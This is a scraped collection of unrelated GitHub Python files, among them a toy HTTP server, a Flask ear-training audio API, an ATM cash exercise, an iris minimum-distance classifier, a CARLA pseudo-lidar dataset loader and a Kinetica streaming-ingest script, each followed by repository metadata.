# output += "<h1>"
# self.wfile.write(bytes(output,"utf-8"))
# self.wfile.write(nameOfRes[0])
# output += ""
# output +=" </h1>"
# output += '''<form method='POST' enctype='multipart/form-data' action='/hello'><h2>What would you like me to say?</h2>
# <input name="message" type="text" ><input type="submit" value="Submit"> </form>'''
except:
pass
def main():
try:
port = 8080
server = HTTPServer(('',port),webserverHandler)
print(("web server running on port %s" % port))
server.serve_forever()
except KeyboardInterrupt:
print("^C entered, stopping web server...")
server.socket.close()
if __name__=='__main__':
main()
|
SelbayevAlmas/fullstack_foundations_example
|
myserver.py
|
myserver.py
|
py
| 7,756 |
python
|
en
|
code
| 1 |
github-code
|
6
|
20573212978
|
from flask import Flask, send_file
app = Flask(__name__)
from tools.sound_file_generator import sound_generator
from tools.interval import Interval
@app.route("/")
def index ():
return "MusicApp is active"
@app.route("/audiofile/<note>")
def get_note_sound(note):
generator = sound_generator()
sound_url = generator.get_sound_url(note)
return send_file(sound_url)
@app.route("/intervals/<root>/<interval>/<category>")
def get_interval_sound(root,interval,category):
"""Get the interval parameters and returns an audio file
in -> string Root Note, string Interval, string category "Melodic" or "Harmonic"
out -> void """
generator = Interval()
interval_url = generator.get_interval_audio_url(root,interval,category)
return send_file(interval_url)
if __name__ =="__main__":
app.run()
|
DanieleSpera/EarTraningAPI
|
__init__.py
|
__init__.py
|
py
| 822 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16021103449
|
''''
Testando o que já vi em python com apenas um programa
'''
class NuBankNextWithLepra:
fish = 100.00
cashFish = 0
tiger = 50.00
cashTiger = 0
monkey = 20.00
cashMonkey = 0
bird = 10.00
cashBird = 0
birdWithLongFeet = 5.00
cashBirdWithLongFeet = 0
turtle = 2.00
cashTurtle = 0
woman = 1.00
cashWoman = 0
cashBank = 1050.00
noCash = 0.0
takeMoney = 0.0
options = ['Saque', 'Deposito']
option = input(f'What you wanna do {options[0]} or {options[1]}')
if option == options[0]:
money = float(input('How much do you wanna take?'))
if money > cashBank:
print(f'You dont have soo much money, you have {cashBank}')
else:
cashBank = cashBank - money
while money != noCash:
while (money / fish) >= 1:
money = money - fish
takeMoney = takeMoney + money
cashFish = cashFish + 1
while (money / tiger) >= 1:
money = money - tiger
takeMoney = takeMoney + money
cashTiger = cashTiger + 1
while (money / monkey) >= 1:
money = money - monkey
takeMoney = takeMoney + money
cashMonkey = cashMonkey + 1
while (money / bird) >= 1:
money = money - bird
takeMoney = takeMoney + money
cashBird = cashBird + 1
while (money / birdWithLongFeet) >= 1:
money = money - birdWithLongFeet
takeMoney = takeMoney + money
cashBirdWithLongFeet = cashBirdWithLongFeet + 1
while (money / turtle) >= 1:
money = money - turtle
takeMoney = takeMoney + money
cashTurtle = cashTurtle + 1
while (money / woman) >= 1:
money = money - woman
takeMoney = takeMoney + money
cashWoman = cashWoman + 1
print(f'Now you have {cashBank} in your account')
print(f' R$:{cashFish*100}, R$:{cashTiger*50}, R$:{cashMonkey*20}, R$:{cashBird*10}, R$:{cashBirdWithLongFeet*5}, R$:{cashTurtle*2}, R$:{cashWoman*1}')
|
Renanas-zz/Python-Scripts
|
bancoComLepra.py
|
bancoComLepra.py
|
py
| 2,349 |
python
|
en
|
code
| 0 |
github-code
|
6
|
1706295460
|
import numpy as np
from sklearn import datasets
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
import numpy as np
from sklearn.model_selection import train_test_split
# MED分类器
class Medclass:
def __init__(self):
self.center_dict = {} # 分类中心点,以类别标签为键 label: center_point(list)
self.feature_number = 0 # 特征维度
self.train_state = False # 训练状态,True为训练完成,False表示还没训练过
def train(self, feature_set, label_set):
new_label_set = {key: value for key, value in enumerate(label_set)} # 将标签集合转换为以下标为键的字典 index: label
self.feature_number = len(feature_set[0])
sample_num = len(label_set) # 样本个数
count = {} # 计算每个类别的样本个数 label: count(int)
# 计算每个类别的分类中心点
for index in range(sample_num):
if new_label_set[index] not in count.keys():
count[new_label_set[index]] = 0
else:
count[new_label_set[index]] += 1 # 计算对应标签的样本数
if new_label_set[index] not in self.center_dict.keys():
self.center_dict[new_label_set[index]] = feature_set[index]
else:
self.center_dict[new_label_set[index]] += feature_set[index]
for _key_ in self.center_dict.keys():
for _feature_ in range(self.feature_number):
self.center_dict[_key_][_feature_] /= count[_key_]
self.train_state = True
# 根据输入来进行分类预测,输出以 下标—预测分类 为键值对的字典
def predict(self, feature_set):
# 先判断此分类器是否经过训练
if not self.train_state:
return {}
sample_num = len(feature_set)
distance_to = {} # 计算某个样本到各分类中心点距离的平方 label: float
result = {} # 保存分类结果 index: label
for _sample_ in range(sample_num):
for _key_ in self.center_dict.keys():
delta = feature_set[_sample_] - self.center_dict[_key_]
distance_to[_key_] = np.dot(delta.T, delta)
result[_sample_] = min(distance_to, key=distance_to.get) # 返回最小值的键(即label)
return result
# 判断预测准确率
def accuracy(self, feature_set, label_set):
if not self.train_state:
return 0.0
correct_num = 0
total_num = len(label_set)
predict = self.predict(feature_set)
for _sample_ in range(total_num):
if predict[_sample_] == label_set[_sample_]:
correct_num += 1
return correct_num / total_num
# 根据指定的阳性类别,计算分类器的性能指标(准确率accuracy,精度precision,召回率recall,特异性specificity,F1_Score)
def performance(self, feature_set, label_set, positive):
if not self.train_state:
return {}
total_num = len(label_set)
predict = self.predict(feature_set)
true_positive, false_positive, true_negative, false_negative = 0, 0, 0, 0
for _sample_ in range(total_num):
if predict[_sample_] == label_set[_sample_]:
if label_set[_sample_] == positive:
true_positive += 1
else:
true_negative += 1
else:
if label_set[_sample_] == positive:
false_negative += 1
else:
false_positive += 1
print("tp=",true_positive,"tn=",true_negative,"fn=",false_negative,"fp=",false_positive)
accuracy = (true_positive + true_negative) / total_num # 准确率(预测正确的样本与总样本数之比)
precision = true_positive / (true_positive + false_positive) # 精度(所有 预测 为阳性的样本中, 真值 为阳性的比例)
recall = true_positive / (true_positive + false_negative) # 召回率(所有 真值 为阳性的样本中, 预测 为阳性的比例)
specificity = true_negative / (true_negative + false_positive) # 特异性(所有 真值 为阴性的样本中, 预测 为阴性的比例)
F1_Score = (2 * precision * recall) / (precision + recall) # 精度与召回率的加权平均
print("accuracy:", accuracy, "precision:", precision, "recall:", recall, "specificity:",specificity, "F1_Score:", F1_Score)
# 获取某一类的样本中心点
def get_center(self, key):
if key in self.center_dict.keys():
return self.center_dict[key]
else:
return []
def get_center_dict(self):
return self.center_dict
#end
#画分割线
# 展示二维平面上,二分类问题的决策线(class_1和class_2)
# feature是样本特征集合,label是对应的标签集合,对每一维特征进行两两比较,n表示特征维数
def show_decision_line(feature, label, med_classifier, class_1=0, class_2=0, n=0):
plt.figure(figsize=(16, 12), dpi=80) # 整张画布大小与分辨率
img = [[] for i in range(n * n)]
for i in range(n):
for j in range(n):
img[i * n + j] = plt.subplot(n, n, i * n + j + 1)
center_1 = med_classifier.get_center(class_1)
center_2 = med_classifier.get_center(class_2)
c_1 = [center_1[i], center_1[j]] # class_1类中心点的i, j两维的分量
c_2 = [center_2[i], center_2[j]] # class_2类中心点的i, j两维的分量
center_3 = [(c_1[0] + c_2[0]) / 2, (c_1[1] + c_2[1]) / 2] # 两点连线的中点
k2, b2 = calculate_vertical_line(c_1, c_2) # 两点中垂线的斜率和截距
plt.scatter(feature[:, i], feature[:, j], c=label, s=20, marker='.') # 整个样本集在特征0和2上的散点图
plt.scatter(c_1[0], c_1[1], c='b', marker='x') # 显示med分类器计算的样本中心点
plt.scatter(c_2[0], c_2[1], c='b', marker='x')
plt.grid(True) # 显示网格线
plt.axis('equal') # 横纵坐标间隔大小相同
plt.axline(c_1, c_2, color='c', linestyle="--", label="connected line")
plt.axline(center_3, slope=k2, color='r', label="decision line")
if i == j:
plt.legend() # 对角线上的子图显示出图例
plt.xlabel("feature " + str(i))
plt.ylabel("feature " + str(j))
plt.tight_layout() # 自动调整子图大小,减少相互遮挡的问题
plt.show()
# 计算两点连线,返回斜率和纵截距(假设是二维平面上的点,并且用列表表示)
def calculate_connected_line(point_1, point_2):
if len(point_1) != 2 or len(point_2) != 2:
return None
k = (point_1[1] - point_2[1]) / (point_1[0] - point_2[0])
b = (point_1[0] * point_2[1] - point_2[0] * point_1[1]) / (point_1[0] - point_2[0])
return k, b
# 计算两点中垂线,返回斜率和纵截距(假设是二维平面上的点,并且用列表表示)
def calculate_vertical_line(point_1, point_2):
if len(point_1) != 2 or len(point_2) != 2:
return None
k = -(point_1[0] - point_2[0]) / (point_1[1] - point_2[1])
b = (point_1[1] + point_2[1] + (point_1[0] + point_2[0]) * (point_1[0] - point_2[0]) / (point_1[1] - point_2[1]))/2
return k, b
#画分割线end
# feature表示样本特征,label表示对应的标签,m行n列共计m*n个子图
def visualization(feature, label, m, n):
plt.figure(figsize=(10, 10), dpi=100)
img = [[] for i in range(m*n)]
for i in range(m):
for j in range(n):
img[i*n+j] = plt.subplot(m, n, i*n+j+1)
plt.xlabel("x"+str(i))
plt.ylabel("x"+str(j))
plt.xlim(-1, 9)
plt.ylim(-1, 9)
plt.scatter(feature[:, i], feature[:, j], s=5, c=label, marker='x')
plt.grid(True) # 显示网格线
plt.tight_layout() # 自动调整子图大小,减少相互遮挡的问题
plt.show()
# feature表示样本特征,label表示对应的标签,m行n列共计m*n个子图
def visualization_white(feature, label, m, n):
plt.figure(figsize=(10, 10), dpi=100)
img = [[] for i in range(m*n)]
for i in range(m):
for j in range(n):
img[i*n+j] = plt.subplot(m, n, i*n+j+1)
plt.xlabel("x"+str(i))
plt.ylabel("x"+str(j))
plt.xlim(-20, 20)
plt.ylim(-20, 20)
plt.scatter(feature[:, i], feature[:, j], s=5, c=label, marker='x')
plt.grid(True) # 显示网格线
plt.tight_layout() # 自动调整子图大小,减少相互遮挡的问题
plt.show()
# 去除某个类别的样本,返回两个numpy数组
def remove_from_data(feature, label, num):
new_feature = []
new_label = []
for index in range(len(label)):
if label[index] != num:
new_feature.append(feature[index])
new_label.append(label[index])
return np.asarray(new_feature), np.asarray(new_label)
# 特征白化,返回白化后的矩阵(numpy数组格式)
# 参数为numpy格式的数组,其格式为数学上的矩阵的转置
def whitening(data):
Ex=np.cov(data,rowvar=False) #Ex为data的协方差矩阵
print(Ex.shape)
a, b = np.linalg.eig(Ex) #原始特征协方差矩阵Ex的特征值和特征向量
#特征向量单位化
modulus=[]
b=np.real(b)
for i in range(b.shape[1]):
sum=0
for j in range(b.shape[0]):
sum+=b[i][j]**2
modulus.append(sum)
modulus=np.asarray(modulus,dtype="float64")
b=b/modulus
#对角矩阵A
a=np.real(a)
A=np.diag(a**(-0.5))
W=np.dot(A,b.transpose())
X=np.dot(W,np.dot(Ex,W.transpose()))
for i in range(W.shape[0]):
for j in range(W.shape[1]):
if np.isnan(W[i][j]):
W[i][j]=0
print(W)
return np.dot(data,W)
if __name__ == '__main__':
iris = datasets.load_iris()
iris_data = iris.data
iris_target = iris.target
iris_target_names=iris.target_names
print(iris)
#可视化
visualization(iris_data,iris_target,4,4)
#去除线性不可分的最后一个
iris_data_linear, iris_target_linear = remove_from_data(iris_data, iris_target, 2)
visualization(iris_data_linear,iris_target_linear,4,4)
#划分训练集、测试集
x_train, x_test, y_train, y_test = train_test_split(iris_data_linear, iris_target_linear, test_size=0.3)
meds=Medclass()
meds.train(x_train,y_train)
meds.performance(x_test, y_test, 0)
# 展示每个特征两两对比图,显示决策线
show_decision_line(x_test, y_test, meds, class_1=0, class_2=1, n=4)
#特征白化
iris_data_white = whitening(iris_data)
print(iris_data_white)
visualization_white(iris_data_white,iris_target,4,4)
#去除线性可分的类
#iris_data_nolinear, iris_target_nolinear = remove_from_data(iris_data, iris_target, 0) #无白化
#visualization(iris_data_nolinear,iris_target_nolinear,4,4)
iris_data_nolinear, iris_target_nolinear = remove_from_data(iris_data_white, iris_target, 0)#白化
visualization_white(iris_data_nolinear,iris_target_nolinear,4,4)
#划分训练集、测试集
x_train, x_test, y_train, y_test = train_test_split(iris_data_nolinear, iris_target_nolinear, test_size=0.3)
meds2=Medclass()
meds2.train(x_train,y_train)
meds2.performance(x_test, y_test, 1)
# 展示每个特征两两对比图,显示决策线
show_decision_line(x_test, y_test, meds2, class_1=1, class_2=2, n=4)
|
suudeer/iris-su2021
|
iris-su2021/iris/main.py
|
main.py
|
py
| 11,704 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26447487026
|
import os
import json
from PIL import Image
import numpy as np
from numpy.core.numeric import full
import torch
from torch.utils.data import Dataset
from tqdm import tqdm
import sys
from pcl_generator import PointCloudGenerator
from lidar_generator import PseudoLidarGenerator
def load_pose(extrinsics: dict) -> np.array:
"""
Load pose as 4x4 matrix from (x, y, z, yaw)
:param extrinsics: Dictionary with extrinsic parameters x, y, z and yaw angle.
:return T: 4x4 transformation matrix as numpy array
"""
sinval = np.sin(extrinsics['yaw'] * np.pi / 180.)
cosval = np.cos(extrinsics['yaw'] * np.pi / 180.)
Rz = np.array([[cosval, -sinval, 0],
[sinval, cosval, 0],
[0, 0, 1]])
t = np.array([extrinsics['x'], extrinsics['y'], extrinsics['z']])
T = np.eye(4)
T[:3, :3] = Rz
T[:3, 3] = Rz @ t
return T
class PseudoLidarData(Dataset):
"""
Adapted from https://github.com/autonomousvision/transfuser/blob/main/transfuser/data.py
"""
def __init__(self, root, config):
self.seq_len = config.seq_len
self.pred_len = config.pred_len
self.ignore_sides = config.ignore_sides
self.ignore_rear = config.ignore_rear
self.input_resolution = config.input_resolution
self.scale = config.scale
with open('pseudolidar/extrinsics.json', mode='r') as f:
extrinsics = json.load(f)
self.front_pose = load_pose(extrinsics['cam_front'])
self.left_pose = load_pose(extrinsics['cam_left'])
self.right_pose = load_pose(extrinsics['cam_right'])
self.rear_pose = load_pose(extrinsics['cam_rear'])
self.img_dims = config.image_dim
self.img_fov = config.fov
self.pc_generator = PointCloudGenerator(self.img_fov, self.img_dims)
self.lidar_generator = PseudoLidarGenerator([self.front_pose,
self.left_pose,
self.right_pose,
self.rear_pose])
self.lidar = []
self.front = []
self.left = []
self.right = []
self.rear = []
self.depth_front = []
self.depth_left = []
self.depth_right = []
self.depth_rear = []
self.x = []
self.y = []
self.x_command = []
self.y_command = []
self.theta = []
self.steer = []
self.throttle = []
self.brake = []
self.command = []
self.velocity = []
for sub_root in tqdm(root, file=sys.stdout):
preload_file = os.path.join(sub_root, 'pseudo_lidar_diag_pl_' +
str(self.seq_len)+'_'+str(self.pred_len)+'.npy')
# dump to npy if no preload
if not os.path.exists(preload_file):
preload_front = []
preload_left = []
preload_right = []
preload_rear = []
preload_lidar = []
preload_depth_front = []
preload_depth_left = []
preload_depth_right = []
preload_depth_rear = []
preload_x = []
preload_y = []
preload_x_command = []
preload_y_command = []
preload_theta = []
preload_steer = []
preload_throttle = []
preload_brake = []
preload_command = []
preload_velocity = []
# list sub-directories in root
root_files = os.listdir(sub_root)
routes = [folder for folder in root_files if not os.path.isfile(os.path.join(sub_root, folder))]
for route in routes:
route_dir = os.path.join(sub_root, route)
# subtract final frames (pred_len) since there are no future waypoints
# first frame of sequence not used
num_seq = (len(os.listdir(route_dir+"/rgb_front/"))-self.pred_len-2)//self.seq_len
for seq in range(num_seq):
fronts = []
lefts = []
rights = []
rears = []
lidars = []
depth_fronts = []
depth_lefts = []
depth_rights = []
depth_rears = []
xs = []
ys = []
thetas = []
# read files sequentially (past and current frames)
for i in range(self.seq_len):
# images
filename = f"{str(seq*self.seq_len+1+i).zfill(4)}.png"
fronts.append(route_dir+"/rgb_front/"+filename)
lefts.append(route_dir+"/rgb_left/"+filename)
rights.append(route_dir+"/rgb_right/"+filename)
rears.append(route_dir+"/rgb_rear/"+filename)
# point cloud
lidars.append(route_dir + f"/lidar/{str(seq*self.seq_len+1+i).zfill(4)}.npy")
depth_fronts.append(route_dir + f"/depth_front/{str(seq*self.seq_len+1+i).zfill(4)}.png")
depth_lefts.append(route_dir + f"/depth_left/{str(seq*self.seq_len+1+i).zfill(4)}.png")
depth_rights.append(route_dir + f"/depth_right/{str(seq*self.seq_len+1+i).zfill(4)}.png")
depth_rears.append(route_dir + f"/depth_rear/{str(seq*self.seq_len+1+i).zfill(4)}.png")
# position
with open(route_dir + f"/measurements/{str(seq*self.seq_len+1+i).zfill(4)}.json", "r") as read_file:
data = json.load(read_file)
xs.append(data['x'])
ys.append(data['y'])
thetas.append(data['theta'])
# get control value of final frame in sequence
preload_x_command.append(data['x_command'])
preload_y_command.append(data['y_command'])
preload_steer.append(data['steer'])
preload_throttle.append(data['throttle'])
preload_brake.append(data['brake'])
preload_command.append(data['command'])
preload_velocity.append(data['speed'])
# read files sequentially (future frames)
for i in range(self.seq_len, self.seq_len + self.pred_len):
# point cloud
lidars.append(route_dir + f"/lidar/{str(seq*self.seq_len+1+i).zfill(4)}.npy")
depth_fronts.append(route_dir + f"/depth_front/{str(seq*self.seq_len+1+i).zfill(4)}.npy")
depth_lefts.append(route_dir + f"/depth_left/{str(seq*self.seq_len+1+i).zfill(4)}.npy")
depth_rights.append(route_dir + f"/depth_right/{str(seq*self.seq_len+1+i).zfill(4)}.npy")
depth_rears.append(route_dir + f"/depth_rear/{str(seq*self.seq_len+1+i).zfill(4)}.npy")
# position
with open(route_dir + f"/measurements/{str(seq*self.seq_len+1+i).zfill(4)}.json", "r") as read_file:
data = json.load(read_file)
xs.append(data['x'])
ys.append(data['y'])
# fix for theta=nan in some measurements
if np.isnan(data['theta']):
thetas.append(0)
else:
thetas.append(data['theta'])
preload_front.append(fronts)
preload_left.append(lefts)
preload_right.append(rights)
preload_rear.append(rears)
preload_lidar.append(lidars)
preload_depth_front.append(depth_fronts)
preload_depth_left.append(depth_lefts)
preload_depth_right.append(depth_rights)
preload_depth_rear.append(depth_rears)
preload_x.append(xs)
preload_y.append(ys)
preload_theta.append(thetas)
# dump to npy
preload_dict = {}
preload_dict['front'] = preload_front
preload_dict['left'] = preload_left
preload_dict['right'] = preload_right
preload_dict['rear'] = preload_rear
preload_dict['lidar'] = preload_lidar
preload_dict['depth_front'] = preload_depth_front
preload_dict['depth_left'] = preload_depth_left
preload_dict['depth_right'] = preload_depth_right
preload_dict['depth_rear'] = preload_depth_rear
preload_dict['x'] = preload_x
preload_dict['y'] = preload_y
preload_dict['x_command'] = preload_x_command
preload_dict['y_command'] = preload_y_command
preload_dict['theta'] = preload_theta
preload_dict['steer'] = preload_steer
preload_dict['throttle'] = preload_throttle
preload_dict['brake'] = preload_brake
preload_dict['command'] = preload_command
preload_dict['velocity'] = preload_velocity
np.save(preload_file, preload_dict)
# load from npy if available
preload_dict = np.load(preload_file, allow_pickle=True)
self.front += preload_dict.item()['front']
self.left += preload_dict.item()['left']
self.right += preload_dict.item()['right']
self.rear += preload_dict.item()['rear']
self.lidar += preload_dict.item()['lidar']
self.depth_front += preload_dict.item()['depth_front']
self.depth_left += preload_dict.item()['depth_left']
self.depth_right += preload_dict.item()['depth_right']
self.depth_rear += preload_dict.item()['depth_rear']
self.x += preload_dict.item()['x']
self.y += preload_dict.item()['y']
self.x_command += preload_dict.item()['x_command']
self.y_command += preload_dict.item()['y_command']
self.theta += preload_dict.item()['theta']
self.steer += preload_dict.item()['steer']
self.throttle += preload_dict.item()['throttle']
self.brake += preload_dict.item()['brake']
self.command += preload_dict.item()['command']
self.velocity += preload_dict.item()['velocity']
print("Preloading " + str(len(preload_dict.item()['front'])) + " sequences from " + preload_file)
def __len__(self):
"""Returns the length of the dataset. """
return len(self.front)
def __getitem__(self, index):
"""Returns the item at index idx. """
data = dict()
data['fronts'] = []
data['lefts'] = []
data['rights'] = []
data['rears'] = []
data['lidars'] = []
seq_fronts = self.front[index]
seq_lefts = self.left[index]
seq_rights = self.right[index]
seq_rears = self.rear[index]
seq_lidars = self.lidar[index]
seq_depth_fronts = self.depth_front[index]
seq_depth_lefts = self.depth_left[index]
seq_depth_rights = self.depth_right[index]
seq_depth_rears = self.depth_rear[index]
seq_x = self.x[index]
seq_y = self.y[index]
seq_theta = self.theta[index]
full_lidar = []
pos = []
neg = []
for i in range(self.seq_len):
data['fronts'].append(torch.from_numpy(np.array(
scale_and_crop_image(Image.open(seq_fronts[i]), scale=self.scale, crop=self.input_resolution))))
if not self.ignore_sides:
data['lefts'].append(torch.from_numpy(np.array(
scale_and_crop_image(Image.open(seq_lefts[i]), scale=self.scale, crop=self.input_resolution))))
data['rights'].append(torch.from_numpy(np.array(
scale_and_crop_image(Image.open(seq_rights[i]), scale=self.scale, crop=self.input_resolution))))
if not self.ignore_rear:
data['rears'].append(torch.from_numpy(np.array(
scale_and_crop_image(Image.open(seq_rears[i]), scale=self.scale, crop=self.input_resolution))))
"""
lidar_unprocessed = np.load(seq_lidars[i])[..., :3] # lidar: XYZI
full_lidar.append(lidar_unprocessed)
"""
pc_front = self.pc_generator.generate(seq_depth_fronts[i], max_depth=0.03)
pc_left = self.pc_generator.generate(seq_depth_lefts[i], max_depth=0.03)
pc_right = self.pc_generator.generate(seq_depth_rights[i], max_depth=0.03)
pc_rear = self.pc_generator.generate(seq_depth_rears[i], max_depth=0.03)
pseudolidar = self.lidar_generator.generate([pc_front, pc_left, pc_right, pc_rear])
full_lidar.append(pseudolidar)
# fix for theta=nan in some measurements
if np.isnan(seq_theta[i]):
seq_theta[i] = 0.
ego_x = seq_x[i]
ego_y = seq_y[i]
ego_theta = seq_theta[i]
# future frames
for i in range(self.seq_len, self.seq_len + self.pred_len):
lidar_unprocessed = np.load(seq_lidars[i])
full_lidar.append(lidar_unprocessed)
# lidar and waypoint processing to local coordinates
waypoints = []
for i in range(self.seq_len + self.pred_len):
# waypoint is the transformed version of the origin in local coordinates
# we use 90-theta instead of theta
# LBC code uses 90+theta, but x is to the right and y is downwards here
local_waypoint = transform_2d_points(np.zeros((1, 3)),
np.pi/2-seq_theta[i], -seq_x[i], -seq_y[i], np.pi/2-ego_theta, -ego_x, -ego_y)
waypoints.append(tuple(local_waypoint[0, :2]))
# process only past lidar point clouds
if i < self.seq_len:
# convert coordinate frame of point cloud
"""
full_lidar[i][:, 1] *= -1 # inverts x, y
full_lidar[i] = transform_2d_points(full_lidar[i],
np.pi/2-seq_theta[i], -seq_x[i], -seq_y[i], np.pi/2-ego_theta, -ego_x, -ego_y)
lidar_processed = lidar_to_histogram_features(full_lidar[i], crop=self.input_resolution)
"""
lidar_processed = PseudoLidarGenerator.post_process(full_lidar[i])
lidar_processed = PseudoLidarGenerator.project_to_bev(lidar_processed)
data['lidars'].append(lidar_processed.copy())
data['waypoints'] = waypoints
# convert x_command, y_command to local coordinates
# taken from LBC code (uses 90+theta instead of theta)
R = np.array([
[np.cos(np.pi/2+ego_theta), -np.sin(np.pi/2+ego_theta)],
[np.sin(np.pi/2+ego_theta), np.cos(np.pi/2+ego_theta)]
])
local_command_point = np.array([self.x_command[index]-ego_x, self.y_command[index]-ego_y])
local_command_point = R.T.dot(local_command_point)
data['target_point'] = tuple(local_command_point)
data['steer'] = self.steer[index]
data['throttle'] = self.throttle[index]
data['brake'] = self.brake[index]
data['command'] = self.command[index]
data['velocity'] = self.velocity[index]
return data
def lidar_to_histogram_features(lidar, crop=256):
"""
Convert LiDAR point cloud into 2-bin histogram over 256x256 grid
"""
def splat_points(point_cloud):
# 256 x 256 grid
pixels_per_meter = 16
hist_max_per_pixel = 5
x_meters_max = 8
y_meters_max = 16
xbins = np.linspace(-2*x_meters_max, 2*x_meters_max+1, 2*x_meters_max*pixels_per_meter+1)
ybins = np.linspace(-y_meters_max, 0, y_meters_max*pixels_per_meter+1)
hist = np.histogramdd(point_cloud[..., :2], bins=(xbins, ybins))[0]
hist[hist > hist_max_per_pixel] = hist_max_per_pixel
overhead_splat = hist/hist_max_per_pixel
return overhead_splat
below = lidar[lidar[..., 2] <= -2.0]
above = lidar[lidar[..., 2] > -2.0]
below_features = splat_points(below)
above_features = splat_points(above)
features = np.stack([below_features, above_features], axis=-1)
features = np.transpose(features, (2, 0, 1)).astype(np.float32)
return features
def scale_and_crop_image(image, scale=1, crop=256):
"""
Scale and crop a PIL image, returning a channels-first numpy array.
"""
# image = Image.open(filename)
(width, height) = (int(image.width // scale), int(image.height // scale))
im_resized = image.resize((width, height))
image = np.asarray(im_resized)
start_x = height//2 - crop//2
start_y = width//2 - crop//2
cropped_image = image[start_x:start_x+crop, start_y:start_y+crop]
cropped_image = np.transpose(cropped_image, (2, 0, 1))
return cropped_image
def transform_2d_points(xyz, r1, t1_x, t1_y, r2, t2_x, t2_y):
"""
Build a rotation matrix and take the dot product.
"""
# z value to 1 for rotation
xy1 = xyz.copy()
xy1[:, 2] = 1
c, s = np.cos(r1), np.sin(r1)
r1_to_world = np.matrix([[c, s, t1_x], [-s, c, t1_y], [0, 0, 1]])
# np.dot converts to a matrix, so we explicitly change it back to an array
world = np.asarray(r1_to_world @ xy1.T)
c, s = np.cos(r2), np.sin(r2)
r2_to_world = np.matrix([[c, s, t2_x], [-s, c, t2_y], [0, 0, 1]])
world_to_r2 = np.linalg.inv(r2_to_world)
out = np.asarray(world_to_r2 @ world).T
# reset z-coordinate
out[:, 2] = xyz[:, 2]
return out
|
jonathsch/multisensor
|
pseudolidar/pseudo_lidar_dataset.py
|
pseudo_lidar_dataset.py
|
py
| 18,526 |
python
|
en
|
code
| 0 |
github-code
|
6
|
28960969271
|
import gpudb
import collections
import time
import pandas as pd
pd.options.display.max_columns = 100
pd.set_option('display.width', 10000)
# init
TABLE = "risk_inputs"
COLLECTION = "RISK"
NEW_TABLE = "bs_stream"
HOST = "<ipaddress>"
ENCODING = "binary"
PORT = "9191"
DATA_PACK = 1
INGEST_FREQ = 3
"Execute python scripts on Kinetica servers using"
"/opt/gpudb/bin/gpudb_python"
# Establish connection to database with necessary credentials
# Pull data from Kinetica and put it directly into a Pandas df
h_db = gpudb.GPUdb(
encoding=ENCODING,
host=HOST,
port=PORT,
username="<username>",
password="<password>")
if h_db.has_table(table_name=TABLE)['table_exists']:
print("Table successfully reached.")
else:
print("Table not found.")
# Pull data from Kinetica and put it directly into a Pandas df
data = h_db.get_records(table_name=TABLE,offset=0,limit=gpudb.GPUdb.END_OF_SET,encoding=ENCODING)
df = pd.DataFrame(gpudb.GPUdbRecord.decode_binary_data(data["type_schema"], data["records_binary"]))
# Column instantiation for the target table
columns = [
["symbol","string"],
["spot_price","float"],
["option_type","string"],
["exposure","string"],
["strike_price","float"],
["maturity_y","int"],
["maturity_m","int"],
["maturity_d","int"],
["calendar","string"],
["day_count","string"],
["risk_free_rate","float"],
["dividend_rate","float"],
["calc_dt_y","int"],
["calc_dt_m","int"],
["calc_dt_d","int"],
["volatility","float"]
]
# Clear the table at run time the create the table
no_error_option = {"no_error_if_not_exists": "true"}
h_db.clear_table(table_name=NEW_TABLE, options=no_error_option)
collection_option_object = gpudb.GPUdbTableOptions.default().collection_name(COLLECTION)
print("Table cleared")
try:
table_gps_obj = gpudb.GPUdbTable(
columns,
NEW_TABLE,
collection_option_object,
h_db
)
print("Table created succesfully")
except gpudb.GPUdbException as e:
print("Table creation failure: {}".format(str(e)))
print(df.head(5))
index = 0
h_db = gpudb.GPUdb(encoding=ENCODING,host=HOST,port=PORT)
# Implement the GpuDB table class instead of manual JSON
my_type = """
{
"type": "record",
"name": "type_name",
"fields": [
{"name": "symbol","type": "string"},
{"name": "spot_price","type": "float"},
{"name": "option_type","type": "string"},
{"name": "exposure","type": "string"},
{"name": "strike_price","type": "float"},
{"name": "maturity_y","type": "int"},
{"name": "maturity_m","type": "int"},
{"name": "maturity_d","type": "int"},
{"name": "calendar","type": "string"},
{"name": "day_count","type": "string"},
{"name": "risk_free_rate","type": "float"},
{"name": "dividend_rate","type": "float"},
{"name": "calc_dt_y","type": "int"},
{"name": "calc_dt_m","type": "int"},
{"name": "calc_dt_d","type": "int"},
{"name": "volatility","type": "float"}
]
}""".replace('\n', '').replace(' ', '')
def stream_ingest(df):
"""This method parses the df and inserts the data into Kinetica row by row
with a 3 second delay in between rows"""
global index
i=0
coords= []
datum = collections.OrderedDict()
for index, row in df.iterrows():
datum["symbol"]=str(df.iloc[index,0])
datum["spot_price"]=float(df.iloc[index,1])
datum["option_type"] = str(df.iloc[index, 4])
datum["exposure"] = str(df.iloc[index, 6])
datum["strike_price"] = float(df.iloc[index, 7])
datum["maturity_y"] = int(df.iloc[index, 8])
datum["maturity_m"] = int(df.iloc[index, 9])
datum["maturity_d"] = int(df.iloc[index, 10])
datum["calendar"] = str(df.iloc[index, 11])
datum["day_count"] = str(df.iloc[index, 12])
datum["risk_free_rate"] = float(df.iloc[index, 13])
datum["dividend_rate"] = float(df.iloc[index, 14])
datum["calc_dt_y"] = int(df.iloc[index, 15])
datum["calc_dt_m"] = int(df.iloc[index, 16])
datum["calc_dt_d"] = int(df.iloc[index, 17])
datum["volatility"] = float(df.iloc[index, 18])
coords.append(h_db.encode_datum(my_type, datum))
i= i + 1
# Pump data in batches
if i % DATA_PACK == 0:
response = h_db.insert_records(
table_name=NEW_TABLE,
data=coords,
list_encoding=ENCODING,
options={})
coords = []
time.sleep(INGEST_FREQ)
print(response)
# Flush the last batch
if i % DATA_PACK != 0:
response = h_db.insert_records(
table_name=NEW_TABLE,
data=coords,
list_encoding=ENCODING,
options={})
# 3 second delay to mimic real time ingest
time.sleep(INGEST_FREQ)
print(response)
return coords
if __name__ == "__main__":
stream_ingest(df)
|
nickalonso/Utilities
|
stream.py
|
stream.py
|
py
| 5,101 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72774157309
|
def Productsmallpair(sum, arr):
if len(arr)<2:
return -1
arr = sorted(arr)
hashMap = dict()
for i in range(len(arr)):
hashMap[arr[i]] = 1
for i in range(len(arr)):
num1 = arr[i]
num2 = sum-num1
if hashMap.get(num2) != None and num2+num1 <= sum:
return num1*num2
return 0
def productSmall(sum, arr):
if len(arr)<2:
return -1
